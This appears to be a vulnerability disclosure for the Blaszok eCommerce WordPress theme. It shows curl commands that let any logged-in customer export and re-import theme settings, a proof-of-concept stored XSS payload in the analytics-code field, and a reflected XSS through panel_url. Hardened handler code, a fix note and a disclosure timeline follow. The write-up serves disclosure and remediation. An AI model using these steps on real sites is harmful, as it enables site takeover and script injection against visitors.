The Blaszok eCommerce WordPress theme suffers from a critical security issue: exposed theme options.
This type of vulnerability means that an attacker can set, update and/or read the options stored for a theme or a plugin.
A lot of premium theme and plugin developers try to implement their own system for storing the settings and options of their product. There are quite a few ready-made solutions that not only cut development time but, chances are, are also much more secure. One prime example is the Redux framework.
I looked at the Blaszok eCommerce theme because it is listed under the eCommerce tag on ThemeForest.
I usually look at the low-hanging fruit first (unserialize and the like), and this showed up:
add_action('wp_ajax_mpcth_export_settings', 'mpcth_export_settings');
[...]
add_action('wp_ajax_mpcth_import_settings', 'mpcth_import_settings');
You can look at the full source code in options-framework.php.
mpcth_import_settings does not check for a capability or a nonce. A wp_ajax_ hook fires for every logged-in user, whatever their role, so under normal circumstances this would be an authenticated stored XSS / exposed theme options issue. But because this is an eCommerce theme, chances are high that WooCommerce is installed.
And if a site runs WooCommerce, chances are high that users can register under the customer role, and once logged in as a customer they can call the mpcth_export_settings and mpcth_import_settings actions.
Export the current settings:
$ curl 'http://127.0.0.1/wp-admin/admin-ajax.php' -H 'Cookie: [CUSTOMER_AUTH_COOKIES]' --data 'action=mpcth_export_settings' > settings.json
Edit the theme settings as needed :)
$ cat settings.json | python -m json.tool > settings_nice.json
$ vi settings_nice.json
I picked the first one that seemed pretty straightforward: mpcth_analytics_code.
"mpcth_analytics_code": "<script>alert('Greetings from WpHutte');</script>",
[...]
"mpcth_enable_analytics": "1",
The next step is to import it:
$ curl 'http://127.0.0.1/wp-admin/admin-ajax.php' -H 'Cookie: [CUSTOMER_AUTH_COOKIES]' -F 'action=mpcth_import_settings' -F '[email protected]_nice.json'
<h3>Importing...</h3><h4>All settings were imported.</h4><script>location.href = ""</script>
As a bonus, there is a reflected XSS as well, since panel_url is echoed straight into a script block:
echo '<h4>' . __('All settings were imported.', 'mpcth') . '</h4>';
echo '<script>location.href = "' . $_REQUEST['panel_url'] . '"</script>';
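For comparison, here is what the two AJAX handlers should have looked like. This is an added example written for this write-up, not code from the Blaszok theme or its vendor; it covers both the missing capability/nonce checks in mpcth_import_settings described above and the reflected XSS via panel_url. It assumes the theme stores its settings in a single option named mpcth_options, that the uploaded file arrives as the import_file form field, and that the admin page passes nonces created with wp_create_nonce('mpcth_import_settings') / wp_create_nonce('mpcth_export_settings'); all three names are hypothetical.

```php
<?php
/*
 * Added example, not the theme's own code.
 * Assumptions (hypothetical): settings live in the option 'mpcth_options',
 * the upload field is named 'import_file', and the admin page sends a nonce
 * in the 'nonce' request parameter for the matching action name.
 */

// wp_ajax_* hooks run for every logged-in user, a WooCommerce customer included,
// so the capability check is what actually restricts who can import settings.
function mpcth_import_settings_hardened() {
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    // The nonce stops a logged-in admin from being driven into this action
    // by a third-party page (CSRF). check_ajax_referer() dies on failure.
    check_ajax_referer( 'mpcth_import_settings', 'nonce' );

    if ( empty( $_FILES['import_file']['tmp_name'] )
        || ! is_uploaded_file( $_FILES['import_file']['tmp_name'] ) ) {
        wp_send_json_error( 'no file uploaded', 400 );
    }

    $raw  = file_get_contents( $_FILES['import_file']['tmp_name'] );
    $data = json_decode( $raw, true ); // JSON only; never unserialize() user input
    if ( ! is_array( $data ) ) {
        wp_send_json_error( 'invalid JSON', 400 );
    }

    update_option( 'mpcth_options', mpcth_sanitize_settings( $data ) );

    // Instead of echoing $_REQUEST['panel_url'] into a <script> block, validate it
    // as a local redirect target and hand it back as data for the page's own JS.
    $panel = isset( $_REQUEST['panel_url'] ) ? wp_unslash( $_REQUEST['panel_url'] ) : '';
    $panel = wp_validate_redirect( esc_url_raw( $panel ), admin_url( 'themes.php' ) );
    wp_send_json_success( array( 'redirect' => $panel ) );
}
add_action( 'wp_ajax_mpcth_import_settings', 'mpcth_import_settings_hardened' );

// Exported settings can contain API keys and other secrets, so the export
// side needs the same capability and nonce checks as the import side.
function mpcth_export_settings_hardened() {
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    check_ajax_referer( 'mpcth_export_settings', 'nonce' );
    wp_send_json( get_option( 'mpcth_options', array() ) );
}
add_action( 'wp_ajax_mpcth_export_settings', 'mpcth_export_settings_hardened' );

// Whitelist of known option keys with a sanitizer per key; anything else is dropped,
// so an import cannot smuggle in keys the theme never defined.
function mpcth_sanitize_settings( array $data ) {
    $allowed = array(
        'mpcth_enable_analytics' => 'absint',
        'mpcth_analytics_code'   => 'mpcth_sanitize_analytics_code',
        // ... one entry per real theme option
    );
    $clean = array();
    foreach ( $allowed as $key => $sanitizer ) {
        if ( array_key_exists( $key, $data ) ) {
            $clean[ $key ] = call_user_func( $sanitizer, $data[ $key ] );
        }
    }
    return $clean;
}

// A free-form "analytics code" field is script by definition, so there is no safe way
// to sanitize arbitrary markup for it. Accept only a tracking ID and let the theme
// render its own fixed snippet around it.
function mpcth_sanitize_analytics_code( $value ) {
    return preg_match( '/^UA-\d{4,10}-\d{1,4}$/', (string) $value ) ? $value : '';
}
```

With these handlers in place, the customer-cookie curl calls shown above get a 403 JSON error instead of the settings dump, and a forged panel_url can no longer land in the response as markup. Restricting the analytics option to a tracking ID is a design choice rather than a sanitization step: if the theme genuinely needs to accept arbitrary script from administrators, the capability check is the only thing standing between that field and stored XSS, which is exactly why it must be there.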
The ability to edit the theme options is pretty scary, but the theme has only about 6,000 sales.
14-07-2017 - Vulnerability discovered
15-07-2017 - Vendor notified
26-07-2017 - Vendor fixed the issues in 3.9.4 (FIXED: Theme Options security vulnerability issue)
14-08-2017 - Vulnerability goes public